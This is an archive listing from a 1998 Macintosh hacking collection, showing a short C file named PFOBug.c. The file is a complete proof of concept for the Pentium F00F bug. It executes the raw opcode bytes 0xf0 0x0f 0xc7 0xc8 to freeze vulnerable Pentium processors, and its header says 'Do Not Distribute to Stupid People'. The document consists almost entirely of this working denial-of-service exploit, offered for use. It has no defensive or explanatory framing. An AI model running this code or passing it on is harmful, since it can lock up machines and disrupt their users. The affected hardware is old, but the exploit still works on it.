home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Hacking & Misc / bundle of exploits.sit / bundle of exploits / PFOBug.c < prev    next >
C/C++ Source or Header  |  1998-07-17  |  267b  |  14 lines

  1. // PFOBug Version 1.0
  2. // This will exploit the Pentium FO Bug
  3. // Do Not Distribute to Stupid People
  4. //               by
  5. //              RooK
  6.  
  7. void main(void)
  8. {
  9.         char freeze[] = { 0xf0, 0x0f, 0xc7, 0xc8 };
  10.         void (*die)();
  11.         die = freeze;
  12.     die();
  13. }
  14.